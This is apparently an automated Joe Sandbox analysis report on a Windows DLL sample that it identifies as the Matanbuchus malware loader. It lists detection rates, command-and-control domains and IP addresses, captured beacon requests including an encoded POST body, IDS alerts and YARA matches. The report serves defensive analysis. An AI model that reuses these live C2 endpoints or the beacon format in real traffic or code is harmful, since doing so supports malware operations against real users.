Windows Analysis Report
useraccount.aspx.dll

AV Detection

Source: baruopas.com	Virustotal: Detection: 5%			Perma Link
Source: sumonare.com	Virustotal: Detection: 5%			Perma Link
Source: https://sumonare.com/	Virustotal: Detection: 5%			Perma Link
Source: https://sumonare.com/projects/index.aspx	Virustotal: Detection: 6%			Perma Link
Source: https://baruopas.com/projects/useraccount.aspx	Virustotal: Detection: 5%			Perma Link

Source: C:\Users\user\8f08\user-PC\user-PC.ocx	ReversingLabs: Detection: 18%
Source: C:\Users\user\8f08\user-PC\user-PC.ocx	Virustotal: Detection: 27%			Perma Link

Source: useraccount.aspx.dll

Virustotal: Detection: 27%

Perma Link

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Compliance

Source: useraccount.aspx.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

Networking

Source: Network traffic

Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49710 -> 194.67.193.12:4433

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 194.67.193.12 443
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 194.67.193.13 443			Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 4433
Source: unknown	Network traffic detected: HTTP traffic on port 4433 -> 49821

Source: global traffic

TCP traffic: 192.168.2.7:49710 -> 194.67.193.12:4433

Source: Joe Sandbox View	ASN Name: IHOR-ASRU IHOR-ASRU
Source: Joe Sandbox View	ASN Name: IHOR-ASRU IHOR-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_7EDF1D60 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,

13_2_7EDF1D60

Source: global traffic	HTTP traffic detected: GET /projects/useraccount.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: baruopas.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: baruopas.com
Source: global traffic	DNS traffic detected: DNS query: sumonare.com

Source: unknown

HTTP traffic detected: POST /projects/cloud-solutions/api-v2/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: sumonare.comContent-Length: 521Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 36 54 43 39 42 55 31 4a 46 5a 33 67 79 4d 55 74 68 63 54 68 73 62 47 4d 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 70 6f 61 6d 4e 46 5a 33 67 30 64 6d 70 35 59 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 55 78 5a 55 35 5a 62 47 73 34 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 44 53 48 4a 48 51 33 68 5a 62 55 46 35 5a 79 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 64 70 5a 6a 46 5a 62 45 6b 32 4e 33 63 39 50 53 49 73 49 6c 6c 72 53 6c 63 69 4f 6c 73 69 64 32 64 6d 56 69 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 64 58 63 39 50 53 49 73 49 6d 68 4f 62 33 5a 4b 62 53 49 36 49 6e 68 6e 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 49 32 55 6e 70 58 55 46 49 35 64 58 4e 70 63 57 49 69 4c 43 4a 7a 64 48 56 5a 49 6a 6f 69 64 44 45 72 51 56 6c 6e 50 54 30 69 4c 43 4a 32 62 30 70 6a 49 6a 6f 69 4b 31 46 49 65 6b 31 42 50 54 30 69 4c 43 4a 33 51 57 4e 49 49 6a 6f 69 65 56 46 6d 57 45 31 6e 59 7a 55 72 56 32 35 6c 55 33 4d 72 61 43 49 73 49 6e 64 52 5a 56 4a 49 49 6a 6f 69 64 56 5a 78 57 6b 56 52 53 69 73 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d Data Ascii: data=eyJBbldGaCI6IjB6TC9BU1JFZ3gyMUthcThsbGM9IiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsIkhkVlFwQSI6InpoamNFZ3g0dmp5YyIsIlFGWnlpaVVYWSI6InUxZU5ZbGs4IiwiUmJvdCI6IjJDSHJHQ3hZbUF5ZyIsIlNiWlduWCI6IndpZjFZbEk2N3c9PSIsIllrSlciOlsid2dmViJdLCJjZktYIjoidXc9PSIsImhOb3ZKbSI6InhnPT0iLCJvQnVNVXUiOiI2UnpXUFI5dXNpcWIiLCJzdHVZIjoidDErQVlnPT0iLCJ2b0pjIjoiK1FIek1BPT0iLCJ3QWNIIjoieVFmWE1nYzUrV25lU3MraCIsIndRZVJIIjoidVZxWkVRSisiLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=

Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sumonare.com/
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sumonare.com/projects/index.aspx
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sumonare.com/projects/index.aspxh=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

System Summary

Source: useraccount.aspx.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF20D90		13_2_6CF20D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF5EED0		13_2_6CF5EED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF615B0		13_2_6CF615B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF4B280		13_2_6CF4B280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDF1D60		13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE76F0		13_2_7EDE76F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDED200		13_2_7EDED200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBF220		13_2_7EDBF220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDB90BD		13_2_7EDB90BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFE179		13_2_7EDFE179
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDFBFC0		13_2_7EDFBFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDE3FA0		13_2_7EDE3FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE0FD8B		13_2_7EE0FD8B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE1EAAE		13_2_7EE1EAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE13A7D		13_2_7EE13A7D
